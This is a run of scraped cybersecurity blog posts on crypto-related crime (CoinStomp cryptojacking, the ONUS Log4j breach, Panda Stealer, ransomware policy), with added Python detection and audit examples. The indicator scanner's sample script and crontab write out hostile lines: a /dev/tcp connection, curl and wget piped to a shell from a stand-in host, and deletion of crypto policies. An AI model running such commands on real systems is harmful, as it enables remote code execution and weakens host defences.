<p>There are some Metamask alternatives such as the <a href="https://www.ambire.com/">Ambire</a> wallet which offers a simpler user interface. This non-custodial wallet features an email registration option, eliminating the need for crypto investors to manage complex seed phrases. Ambire has launched a web application that new investors can easily navigate compared to the browser extension offered by Metamask. </p>
<p>Crypto investors are not limited to the services offered by centralized exchanges. It is much easier to navigate the DeFi ecosystem through non-custodial wallets like Metamask and Ambire.</p>
<p>The value of any asset is largely dependent on the ability to liquidate without much trouble; that being the case, crypto investors ought to be very careful about where they store their assets. As much as crypto exchanges are easily accessible, the underlying risks cannot be ignored. It is much better to store one’s funds in a decentralized platform where they have full control instead of relying on centralized intermediaries that have proven to be easily compromised by hackers and regulatory measures. </p>
<p>Investors beware: Crypto assets have lost nearly $800 billion in market value in the past 30 days per a recent report posted on pymnts.com.</p>
<p>Article: <a href="{{#staticFileLink}}10599272473,original{{/staticFileLink}}">TR-22-178-001.pdf</a></p></div>Russian Bank Robbershttps://redskyalliance.org/xindustry/russian-bank-robbers2022-04-26T14:47:53.000Z2022-04-26T14:47:53.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10440901073,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10440901073,RESIZE_400x{{/staticFileLink}}" width="250" alt="10440901073?profile=RESIZE_400x" /></a>The financial sector is a prime target for criminal cartels and nation-state actors. Criminals seek a lucrative market, and nation-states treat profit as a form of sanctions-busting. The high volume of Russian-speaking gangs and the current sanctions against the Russian state make Russia a major threat to financial institutions today.</p>
<p>The reason that financial institutions are under constant attack is simple: that’s where the money is today. This is no different from the statement made by the famous 1930s bank robber Willie Sutton who, when asked why he robbed banks, replied, “I rob banks because that is where the money is.” The 21st Century bank robbers are advanced criminal gangs (often part of a larger cartel) and nation-states. The nation-state attackers are particularly North Korean or Russian, where the proceeds are used to offset sanctions. According to the World Economic Forum, the proceeds associated with the dark web are more than $1 trillion per year, and it is estimated that more than 50% of that goes right back into the Russian economy, or President Putin’s personal bank accounts.</p>
<p>The complexity of the Russian threat comes from the connections between the criminal cartels and the Russian state agencies. Consider ransomware: most of the ransomware gangs are Russian speaking, which is why most ransomware will not detonate on anything that has a Russian language package. But in order to exist as a ransomware gang, typically part of a larger cybercrime cartel, you have to pay homage to the GRU [the foreign military intelligence agency of the General Staff of the Armed Forces of the Russian Federation] and the FSB [the Federal Security Service of the Russian Federation].</p>
<p>The way you do that is to share your information or, more specifically, access to the RAT you left behind. And if called upon to be patriotic, you may be called upon to be more destructive in your endeavors within the financial institutions. ‘Destructive’ in the finance sector does not mean the deployment of a wiper to destroy systems, but manipulation of the data to make it wrong or worthless.</p>
<p>The Russian government doesn’t want to take down the financial sector, because they are regularly robbing it to offset economic sanctions. What they will typically do is leverage destructive attacks as part of the counter incident response when they realize that law enforcement has become involved. While ransomware is up this year, it does not represent the primary source of income for criminals. This comes from market manipulation through the abuse of stolen financial information.</p>
<p>Financial acumen might help with malicious digital insider trading, but it is far from necessary. What matters is understanding that non-public market information is worth more than money, because whoever holds it can profit from it.</p>
<p>Investigators report that a simple way of getting this information is to target the laptops used by the people that manage the portfolios and market strategies of the financial institutions. Criminals can spy on them until they see a major position about to be taken, or find a presentation that will be made to the senior management.</p>
<p>Present in all financial institutions there is always a surveillance department that conducts traditional surveillance for regulatory compliance on everyone who conducts finance. Unfortunately, there is a disconnection between the surveillance department and the cybersecurity department. The surveillance department is looking for a traditional insider threat rather than a digital insider threat. A trader might not have been a threat, but there was something on his machine that could be used by others as an advantage.</p>
<p>One of the biggest year-on-year threats reported has been called island hopping. Island hopping is similar to supply chain threats, but different because in the finance sector there is no clearly defined end target such as a prime contractor. Each hop opens multiple new possibilities (targets), and the criminals will not stop “hopping” as more targets emerge.</p>
<p>The concern over cryptocurrency exchange security is not because they are financial institutions, but precisely because, in the technical sense, they are not financial institutions. In short, they are not controlled or regulated in the same way as official financial institutions. The security of crypto exchanges is minimal because of an over-reliance on the security of blockchains. Many of these exchanges realize that they are complicit in the laundering of cybercriminal proceeds, and they just turn a blind eye to it because they don’t have any reporting requirements and they still earn their fees.<a href="#_ftn1">[1]</a></p>
<p>But at the same time, financial institutions are moving to fintech through digital transformation. The financial institutions are trying to become part of the new digital world and they are partnering with these exchanges and virtual currencies to facilitate adoption and greater liquidity for proceeds from retail customers. Where this becomes interesting and potentially damaging is in the use of APIs between the two organizations, and the ongoing surge in API attacks. As a result, the poor security posture of a crypto exchange could lead to island hopping via an API into the financial institution.</p>
<p>It is currently the practice that CISOs at financial institutions still report to the CIO. Cyber threat professionals have stated the opinion that if there was ever an industry that necessitates the CISO to be more significant than the CIO, it is finance. There may be a conflict of interest for a CIO to be managing a CISO in the financial sector. The charter of financial institutions is safety and soundness and trust and confidence. But in the age of digital transformation for financial institutions, the CIO will inherently increase the attack surface. The CISO is more concerned with risk management and risk management should be the dominant paradigm in finance.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/vmwares-head-cybersecurity-strategy-discusses-modern-bank-heists">https://www.securityweek.com/vmwares-head-cybersecurity-strategy-discusses-modern-bank-heists</a></p></div>A Look into CoinStomp and Cryptojackinghttps://redskyalliance.org/xindustry/a-look-into-coinstomp-and-cryptojacking2022-02-17T14:25:43.000Z2022-02-17T14:25:43.000ZMichael Brousseauhttps://redskyalliance.org/members/MichaelBrousseau<div><p><a href="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}" alt="10115777254?profile=RESIZE_400x" width="216" /></a>A new malware family is targeting Asian cloud service providers and using compromised resources to mine cryptocurrency. The malware, CoinStomp, makes use of Timestomping, Command and Control through reverse shells, removal of target system’s cryptographic policies, and references to a previous cryptojacking campaign, Xanthe.</p>
<p>Cryptojacking is the process of compromising machines and using their resources to mine for cryptocurrencies. This attack method has grown popular as an alternative to building sophisticated mining machines, which create large overhead costs. By compromising existing machines, attackers can mine crypto without paying for resources. The formula is simple: the more resources an attacker has access to, the more crypto they can mine. Cloud service providers are a lucrative target for cryptojacking attackers because CSPs provide solutions including Infrastructure as a Service (IaaS), which provides resources directly to customers. The infrastructure is already in place; all the attacker needs to do is gain access.</p>
<p>Cryptojacking software is designed to run unbeknownst to the victim. To remain undetected CoinStomp uses a technique called Timestomping. Timestomping involves the manipulation of file timestamps. It is frequently used to confuse and mislead digital forensic investigators. Timestomping allows attackers to change the access records and file creation records to help malicious files blend into the target environment. A query based on recently installed files and programs will yield little evidence if the time stamps of the malicious files have been manipulated. On Linux systems a simple “touch” command with the “-t” flag and a made-up timestamp can be used to change the timestamp.</p>
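<p>The forensic counter to the timestomping just described, as an added example that is neither CoinStomp’s nor Cado Security’s code: <code>touch -t</code> (and <code>os.utime</code>, which it calls) rewrites a file’s atime and mtime, but on Linux the inode change time (ctime) cannot be set from user space and is updated by the touch itself. A file whose mtime is far older than its ctime, or whose mtime lies in the future, therefore deserves a closer look. The sample directory, file names and the one-day skew threshold are constructed assumptions for the example.</p>

```python
"""Timestomp triage: compare mtime against ctime, which user space cannot set.
Added example with a constructed sample directory; assumes Linux semantics."""
import os
import tempfile
import time
from pathlib import Path
from typing import Dict, Optional

SKEW_SECONDS = 24 * 3600   # assumption: more than a day between mtime and ctime is worth a look
FUTURE_SLACK = 60          # tolerate a minute of clock drift before calling an mtime "future"


def classify_timestamps(root: str, skew: float = SKEW_SECONDS, now: Optional[float] = None) -> Dict[str, str]:
    """Return {file name: reason} for files whose mtime disagrees with the inode's history.

    A backdated file shows an mtime far older than its ctime (the kernel stamped
    ctime at the moment of the touch); an mtime ahead of the clock is never normal.
    """
    now = time.time() if now is None else now
    flagged: Dict[str, str] = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        st = path.stat()
        if st.st_mtime > now + FUTURE_SLACK:
            flagged[path.name] = "mtime_in_future"
        elif st.st_ctime - st.st_mtime > skew:
            flagged[path.name] = "mtime_older_than_ctime"
    return flagged


def build_sample_tree() -> str:
    """Constructed evidence: one honest file, one backdated file, one dated in the future."""
    root = Path(tempfile.mkdtemp(prefix="timestomp_demo_"))
    (root / "normal.conf").write_text("ok\n")

    backdated = root / "libsystem.so"
    backdated.write_text("not really a library\n")
    old = time.mktime((2019, 5, 1, 3, 4, 5, 0, 0, -1))
    os.utime(backdated, (old, old))        # same effect as: touch -t 201905010304.05 libsystem.so

    ahead = root / "update.sh"
    ahead.write_text("echo placeholder\n")
    future = time.time() + 10 * 365 * 86400
    os.utime(ahead, (future, future))
    return str(root)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for name, reason in classify_timestamps(sample_root).items():
        print(f"{name}: {reason}")
```

<p>Treat the output as triage, not proof: package managers and <code>tar</code> preserve the archived mtime on extraction, so every freshly installed file also shows an mtime older than its ctime. Baseline against the package manifest or install log and chase the files that have no such explanation.</p>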
<p>Using reverse shells to contact the Command and Control (C2) servers on port 443, the port normally used for HTTPS traffic, means that this traffic will usually pass seamlessly through the firewall, as outbound HTTPS traffic is not normally restricted. The reverse shell uses bash’s /dev/tcp/[host]/[port] pseudo-device to open a TCP connection to the designated host on the specified port; redirecting a shell’s input and output through it gives the attacker a two-way (read/write) channel. The malware also uses curl to install additional payloads and provide status updates to the C2 servers.</p>
<p>To allow for successful installation of payloads, CoinStomp uses a command to remove cryptographic policy files. These policies are responsible for allowing or blocking protocols based on the cryptographic protocol version. Usually, insecure protocols will be blocked, but malware often makes use of these protocols for installations and remote connections. By disabling the cryptographic policies CoinStomp can install payloads and make the connections it needs.</p>
<p>CoinStomp uses the Cron scheduler to carry out tasks, and embedded in the code is a URL that has been commented out, meaning there is no command to reach the URL. Researchers at Cado Security followed the URL to <a href="http://xanthe.anondns.net:8080/files/fczyo">http://xanthe.anondns.net:8080/files/fczyo</a>. Xanthe was previously a cryptojacking campaign that now has ties to the Abcbot botnet and Distributed Denial of Service (DDoS) attacks. The Xanthe cryptojacking campaign made use of a script called fczyo. This may point to a connection to the Xanthe campaign, but it is also possible that it was an attempt to mislead investigators.</p>
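<p>The three behaviours in the preceding paragraphs (the /dev/tcp connection, the removal of cryptographic policy files, the cron task and the commented-out URL) are all visible as text in a dropped script or a crontab, so a line-oriented indicator scan is a cheap first pass. The following is an added example, not code from CoinStomp or from Cado Security; the sample script and crontab are constructed, the addresses use documentation ranges and an <code>.invalid</code> host, and the <code>/etc/crypto-policies</code> path is an assumption about RHEL-family systems.</p>

```python
"""Line-oriented indicator scan for shell scripts and crontabs.
Added example; the sample script and crontab below are constructed."""
import re
from typing import List, Pattern, Tuple

Finding = Tuple[str, int, str]  # (indicator, line number, offending line)

# Checked in this order on every line; a line can match more than one.
INDICATORS: List[Tuple[str, Pattern[str]]] = [
    # a URL left only in a comment is still a lead worth pivoting on
    ("commented_url", re.compile(r"^\s*#.*https?://")),
    # assumption: RHEL-family systems keep their policy under /etc/crypto-policies
    ("crypto_policy_tamper", re.compile(r"\b(rm|mv|unlink)\b.*crypto-policies")),
    ("dev_tcp_connection", re.compile(r"/dev/tcp/")),
    ("remote_download_exec", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
]

SAMPLE_SCRIPT = """#!/bin/sh
# constructed sample for the scanner; not a real CoinStomp artefact
# http://example.invalid/files/stage2
rm -rf /etc/crypto-policies
echo up > /dev/tcp/203.0.113.10/443
curl -s http://example.invalid/stage2.sh | sh
echo done
"""

SAMPLE_CRONTAB = """0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * wget -qO- http://example.invalid/stage2.sh | bash
"""


def scan_lines(text: str) -> List[Finding]:
    """Return every (indicator, line number, line) hit, in file order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((kind, lineno, line.strip()))
    return findings


def indicator_kinds(text: str) -> List[str]:
    """Just the indicator names, handy for a quick verdict or a log line."""
    return [kind for kind, _, _ in scan_lines(text)]


if __name__ == "__main__":
    for label, text in (("script", SAMPLE_SCRIPT), ("crontab", SAMPLE_CRONTAB)):
        for kind, lineno, line in scan_lines(text):
            print(f"{label}:{lineno}: {kind}: {line}")
```

<p>Feed it the contents of <code>/etc/cron*</code>, per-user crontabs and any script recovered from the host. A hit on <code>dev_tcp_connection</code> or <code>crypto_policy_tamper</code> is a strong signal on its own; <code>remote_download_exec</code> also matches legitimate install one-liners, so confirm the source host before acting on it.</p>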
<p>The recent discovery of the CoinStomp malware family points out that attackers are knowledgeable about cloud security vulnerabilities, Linux security techniques, and how to mislead digital forensics investigators in the incident response process. Cado Security provided Indicators of Compromise (IoCs) which are pictured below.</p>
<p><a href="{{#staticFileLink}}10115777291,RESIZE_930x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115777291,RESIZE_710x{{/staticFileLink}}" alt="10115777291?profile=RESIZE_710x" width="600" /></a><a href="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}" alt="10115778058?profile=RESIZE_180x180" width="171" /></a></p>
</div>Vietnamese Crypto Trading Platform Hit with Log4jhttps://redskyalliance.org/xindustry/vietnamese-crypto-trading-platform-hit-with-log4j2022-01-12T17:02:57.000Z2022-01-12T17:02:57.000ZMichael Brousseauhttps://redskyalliance.org/members/MichaelBrousseau<div><p><a href="{{#staticFileLink}}10006159689,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10006159689,RESIZE_400x{{/staticFileLink}}" alt="10006159689?profile=RESIZE_400x" width="250" /></a>ONUS, the Vietnamese crypto trading platform, recently experienced an attack stemming from the Log4j vulnerability (CVE-2021-44228).<a href="#_ftn1">[1]</a> ONUS allows users to trade cryptocurrencies through their app which is available for iOS and Android. The organization has grown significantly in the past 18 months since the app’s launch in March of 2020, with a large portion of users in Vietnam, Nigeria, and the Philippines.<a href="#_ftn2">[2]</a></p>
<p>Financial organizations, and crypto platforms in particular, are juicy targets for attackers looking to lift personal information, payment information, and monetary sums, all of which are present in a typical crypto company’s data stores. ONUS is no different, as the Log4j exploit allowed attackers to access stored information about the organization’s customers.</p>
<p>The vulnerability existed in the point-of-sale (POS) solution used by ONUS, and the attackers were able to get into servers and create a backdoor for extended access to electronic Know Your Customer (eKYC) information, which includes identification documents and customer video selfies, among other information used to authenticate customers.</p>
<p>CyStack, the vendor for the POS solution Cyclos used by ONUS, acknowledged that the Log4j vulnerability was the entry point for the attacks. Upon further analysis, CyStack determined that attackers leveraged misconfigurations and permissions in ONUS’ AWS S3 buckets to access and exfiltrate the information.</p>
<p>The attackers were able to make off with the data before an update patching the Log4j vulnerability was available and demanded $5 million in ransom for the stolen information. The Log4j exploit has been used in the wild to install malware, use remote machines for crypto mining, and deploy ransomware binaries.<a href="#_ftn3">[3]</a></p>
<p>The attackers waited until 25 December 2021 for payment from ONUS, and when they did not receive the ransom, they put the information of close to 2 million customers up for sale. The data was listed on the Raid forum and includes personal information and hashed passwords.<a href="#_ftn4">[4]</a> This data also includes eKYC information, which is comprised of identification cards, passports, and video selfies of users for authentication purposes.<a href="#_ftn5">[5]</a></p>
<p>CyStack did ultimately make recommendations for ONUS to help prevent these vulnerabilities from being exploited in the future. These recommendations include:</p>
<ul>
<li>Patching the Log4j vulnerability in Cyclos using the vendor’s instructions.</li>
<li>Deactivating all of the leaked credentials for the AWS S3 buckets.</li>
<li>Configuring permissions to secure access to AWS S3 buckets.</li>
<li>Blocking public access to S3 buckets and requiring tokens for access to sensitive objects.</li>
</ul>
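The S3 hardening that the last three recommendations call for, as an added example that is not CyStack's or ONUS's code: an offline audit of a bucket's Block Public Access settings and bucket policy, run over two constructed configurations, the exposed one and the corrected one. The bucket name, account id and role name are placeholders; the input dicts follow the shape boto3 returns from get_public_access_block() and get_bucket_policy().

```python
"""Audit helper for the S3 exposures behind the ONUS data theft: Block Public
Access not enabled and a bucket policy granting object reads to everyone.
Added example (not CyStack's or ONUS's code). Input dicts are constructed in the
shape boto3 returns: get_public_access_block()["PublicAccessBlockConfiguration"]
and json.loads(get_bucket_policy()["Policy"]); bucket name, account id and role
name are placeholders."""
import json

# The four settings behind "Block all public access" on a bucket.
BLOCK_PUBLIC_ACCESS_SETTINGS = (
    "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets",
)


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}: anyone on the internet, no credentials."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def public_statements(policy):
    """Allow statements that grant an anonymous principal access with no Condition
    narrowing the grant. Accepts the policy as a JSON string or a parsed dict."""
    doc = json.loads(policy) if isinstance(policy, str) else (policy or {})
    return [s for s in _as_list(doc.get("Statement"))
            if s.get("Effect") == "Allow"
            and _is_anonymous(s.get("Principal"))
            and not s.get("Condition")]


def block_public_access_gaps(config):
    """Names of the Block Public Access settings that are off (or missing)."""
    return [k for k in BLOCK_PUBLIC_ACCESS_SETTINGS if not (config or {}).get(k, False)]


def audit_bucket(name, public_access_block, policy):
    """One finding string per problem; an empty list means the bucket passes."""
    findings = []
    gaps = block_public_access_gaps(public_access_block)
    if gaps:
        findings.append(f"{name}: Block Public Access incomplete, off: {', '.join(gaps)}")
    # A public statement is reported even when RestrictPublicBuckets would currently
    # neutralise it: the policy is still wrong and one toggle away from exposure.
    for s in public_statements(policy):
        actions = ", ".join(_as_list(s.get("Action")))
        findings.append(f"{name}: statement {s.get('Sid', '<no Sid>')} allows {actions} for Principal *")
    return findings


BUCKET = "example-ekyc-documents"  # placeholder name
# Constructed: the exposed setup, identity documents readable by anyone who finds a URL.
WEAK_PAB = {k: False for k in BLOCK_PUBLIC_ACCESS_SETTINGS}
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": f"arn:aws:s3:::{BUCKET}/*"}],
}
# Constructed: the corrected setup. All four settings on; reads limited to the
# application role (one way to meet "tokens for sensitive objects" is to have that
# role issue short-lived pre-signed URLs); plaintext transport denied.
HARDENED_PAB = {k: True for k in BLOCK_PUBLIC_ACCESS_SETTINGS}
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AppRoleRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/ekyc-api"},  # placeholder
         "Action": ["s3:GetObject"], "Resource": f"arn:aws:s3:::{BUCKET}/*"},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": [f"arn:aws:s3:::{BUCKET}", f"arn:aws:s3:::{BUCKET}/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
}

if __name__ == "__main__":
    for label, pab, pol in (("weak", WEAK_PAB, WEAK_POLICY),
                            ("hardened", HARDENED_PAB, HARDENED_POLICY)):
        print(label, audit_bucket(BUCKET, pab, pol) or ["no findings"])
```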
<p>The Log4j vulnerability has been extensively exploited since its discovery in late 2021. Organizations and vendors are scrambling to create and implement patches for this zero-day that allows for remote code execution. The Log4j vulnerability received a CVSS score of 10, meaning it is a critical risk. Common Vulnerability Scoring System (CVSS) is used to rate vulnerabilities so cyber security professionals can prioritize their patching efforts.</p>
<p>A rating of 10 puts remediation of this vulnerability at the top of your security priority list. Updating to Log4j version 2.17 will aid in the remediation process. Based on statistics by Snyk, 60.8% of Java projects rely on Log4j indirectly, which means that even if your organization is not using software that directly relies on Log4j, there are dependencies that could indirectly affect your security posture.<a href="#_ftn6">[6]</a></p>
<p><a href="#_ftnref1">[1]</a> ONUS Trading Platform From: Lưu Quý/ VnExpress</p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.globenewswire.com/news-release/2021/12/20/2355023/0/en/1-5-million-users-in-just-18-months-with-ONUS-anyone-can-have-some-Bitcoin.html">https://www.globenewswire.com/news-release/2021/12/20/2355023/0/en/1-5-million-users-in-just-18-months-with-ONUS-anyone-can-have-some-Bitcoin.html</a></p>
<p><a href="#_ftnref3">[3]</a> <a href="https://venturebeat.com/2021/12/21/second-ransomware-family-exploiting-log4j-spotted-in-u-s-europe/">https://venturebeat.com/2021/12/21/second-ransomware-family-exploiting-log4j-spotted-in-u-s-europe/</a></p>
<p><a href="#_ftnref4">[4]</a> <a href="https://coinlive.me/more-than-2-million-onus-users-have-their-information-leaked-on-the-raid-forum-12287.html">https://coinlive.me/more-than-2-million-onus-users-have-their-information-leaked-on-the-raid-forum-12287.html</a></p>
<p><a href="#_ftnref5">[5]</a> <a href="https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/">https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/</a></p>
<p><a href="#_ftnref6">[6]</a> <a href="https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/">https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/</a></p></div>Do you know where your Bitcoins are Today?https://redskyalliance.org/xindustry/do-you-know-where-your-bitcoins-are-today2021-05-26T21:07:51.000Z2021-05-26T21:07:51.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8989703898,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8989703898,RESIZE_400x{{/staticFileLink}}" width="250" alt="8989703898?profile=RESIZE_400x" /></a>A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam. <a href="https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html">Panda Stealer</a> malware uses spam emails and the same hard-to-detect fileless distribution method deployed by a recent <a href="https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware">Phobos</a> ransomware campaign discovered by investigators.</p>
<p>The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States. Panda Stealer was discovered by <a href="https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html">Trend Micro</a> at the beginning of April 2021. Threat researchers have identified two infection chains being used by the campaign. Analysts said: "In one, an .XLSM attachment contains macros that download a loader, then the loader downloads and executes the main stealer. </p>
<p>"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command." Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.</p>
<p>Panda has other capabilities, such as taking screenshots of the infected computer and exfiltrating browser data such as cookies, passwords, and card details. Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended.</p>
<p>Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de. "Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers. CollectorStealer (also known as DCStealer) is malicious software which allows cyber criminals to steal various sensitive information (e.g. passwords, credit card details) and files. This malware is for sale on a hacker forum for $12 or $75 (depending on the subscription type). It is advertised on the aforementioned forum as a "top-end information stealer" with a Russian interface.</p>
<p>While the stealers behave similarly, they have different command and control server URLs, build tags, and execution folders. When analyzing the different types of attacks detected across seven million enterprise endpoints over the last 12 months, researchers found that infostealers made up the highest percentage of attempted endpoint attacks (31%).</p>
<p>Red Sky Alliance has been analyzing and documenting cyber threats and groups for over 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org/">https://redskyalliance.org</a> at no charge. Many past tactics are reused in current malicious campaigns.</p>
<p>To protect your own supply chain, consider subscribing to RedXray, Red Sky Alliance’s cyber threat notification service. Details can be found at: <a href="https://www.wapacklabs.com/redxray">https://www.wapacklabs.com/redxray</a>.</p>
<p><a href="{{#staticFileLink}}8989705655,original{{/staticFileLink}}">TR-21-146-001_Bitcoin.pdf</a></p>
<p><a href="https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt">https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt</a></p></div>Can Cryptocurrency Regulation stop Ransomware Attacks? Unlikelyhttps://redskyalliance.org/xindustry/can-cryptocurrency-regulation-stop-ransomware-attacks-unlikely2021-05-23T22:08:26.000Z2021-05-23T22:08:26.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8959863057,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8959863057,RESIZE_400x{{/staticFileLink}}" width="250" alt="8959863057?profile=RESIZE_400x" /></a>A coalition of government agencies and security firms has released a <a href="https://securityandtechnology.org/blog/ransomware-task-force-to-unveil-comprehensive-framework-to-combat-ransomware/">framework</a> for how to disrupt ransomware attacks that calls for expanded regulation of the global cryptocurrency market to better track the virtual coins paid to cybercriminals during extortion schemes.</p>
<p>On 29 April 2021, the Institute for Security and Technology's <a href="https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/ist-ransomware-task-forcefinalreport-1.pdf">Ransomware Task Force</a> published the framework, which features 48 proposals. It calls for a coordinated, international diplomatic and law enforcement effort to combat these cyberthreats - for example, by discouraging nation-states from harboring cybercriminals and their operations. The group also encourages the White House to take the lead on addressing ransomware by creating a group that includes representatives of the National Security Council, the office of the National Cyber Director, and security companies to coordinate the effort.</p>
<p>The Ransomware Task Force also recommends that the U.S. and other nations create a response and recovery fund to support the responses to ransomware. The framework also calls for laws that would require organizations to report ransomware payments.</p>
<p>"One thing is clear, ransomware is a threat to our national security," says Secretary of Homeland Security Alejandro Mayorkas, who has made <a href="https://www.govinfosecurity.com/dhs-to-provide-25-million-more-for-cybersecurity-grants-a-16076">ransomware</a> one of the top cybersecurity priorities for his department. "Like most cyberattacks, ransomware exploits the weakest link. In recent months, ransomware attacks in hospitals in New York, Nebraska, Oregon and in Michigan have taken place during what is an unprecedented pandemic."</p>
<p>Although the framework offers dozens of suggestions, it emphasizes better tracking and regulating the markets for bitcoin and other cryptocurrencies, the favorite form of payment for cybercriminal organizations and their affiliates.</p>
<p>"The use of cryptocurrency adds to the challenge of identifying ransomware criminals, as payments with these currencies are difficult to attribute to any individual," according to the report. "Often the money does not flow straight from ransomware victim to criminal; it travels through a multi-step process involving different financial entities, many of which are novel and are not yet part of standardized, regulated financial payments markets."</p>
<p>Philip Reiner, CEO of the Institute for Security and Technology, notes that the goal of the framework is to emphasize that ransomware has grown into a problem that goes far beyond cybercriminals extorting companies.</p>
<p>"Ransomware has risen to the level of being a much broader societal challenge, and a national security threat, not just the niche computer crime that impacts organizations," Reiner says. "We were really struck by the notion that with all of the resources that governments and companies around the world have to bring to bear on a problem like this … How is it that this wreck is continuing to metastasize, and why hasn't someone been able to put together all of the right people to better direct resources?"</p>
<p>In March 2021, <a href="https://www.databreachtoday.com/mark-ransomwares-success-370-million-in-2020-profits-a-16121">Chainalysis</a> published a report that estimated criminal groups reaped $370 million in ransom payments in 2020, up 336% from 2019.</p>
<p>A report published this week by incident response firm Coveware found that in the first quarter of this year, the average cyber extortion payoff reached $220,298, a 43% increase from the previous quarter. This increase is being driven, in part, by ransomware gangs taking advantage of unpatched vulnerabilities in the older versions of the Accellion File Transfer Appliance.</p>
<p>In the report, the Ransomware Task Force notes that in 2020, about 2,400 U.S. organizations were targeted in ransomware attacks, including 1,700 schools, colleges and universities as well as 560 healthcare organizations.</p>
<p>The new framework emphasizes that disrupting the ransomware business model, including the ability of cybercriminals to extort cryptocurrency payments from victims and then hide those transactions from law enforcement agencies, is key to reducing these types of attacks. An important step, the framework notes, is the adoption of laws and regulations designed to better track the virtual currency that flows through cryptocurrency exchanges, crypto kiosks and over-the-counter trading desks, where cybercriminals can hide the transactions and cash out their earnings thanks to the loose rules now in place.</p>
<p>Agencies such as the U.S. Treasury Department and the Securities and Exchange Commission, along with their international counterparts, also need to improve enforcement of existing rules and regulations, such as anti-money laundering laws and laws that combat financing of terrorism. Some laws, such as the <a href="https://www.cisa.gov/publication/cybersecurity-information-sharing-act-2015-procedures-and-guidance">Cybersecurity Information Sharing Act of 2015</a>, need updates, the framework points out.</p>
<p>The framework also notes that financial institutions need to address ransomware attacks. Banks should "pursue SEC enforcement of cryptocurrency businesses that fail to register as broker-dealers, transfer agents, clearing agencies, and money service businesses, with particular focus on mixing services that obfuscate criminal transactions with legal traffic," the framework states.</p>
<p>Other recommendations in the task force report include:</p>
<ul>
<li>Encouraging cryptocurrency exchanges, trading desks and others to share information with law enforcement agencies about suspicious transactions;</li>
<li>Providing law enforcement agencies with the ability to issue letters to crypto entities requesting that ransomware funds be frozen as proceeds of crime that can then be seized by the government;</li>
<li>Creating the ability to blacklist digital wallets associated with criminal gangs;</li>
<li>Improving civil recovery and asset forfeiture processes;</li>
<li>Building an insurance-sector consortium to share ransomware loss data.</li>
</ul>
<p>The task force also says much more needs to be done to disrupt the infrastructure that cybercriminals use to support their malicious activities. It calls on Congress to update the <a href="https://www.law.cornell.edu/uscode/text/18/1030">Computer Fraud and Abuse Act</a> so that infrastructure providers will be encouraged to report criminal activity.</p>
<p>"If a hosting company is made aware that a customer is conducting attacks from one of the hosting company’s servers, they can typically shut down the customer's service due to a violation of the company’s terms of service," the report notes. "In a less clear scenario, if a telecommunications company is provided a signature that identifies malicious network traffic and they block the traffic from transiting their network, thereby disrupting the malicious activity, the company may have some legal liability."</p>
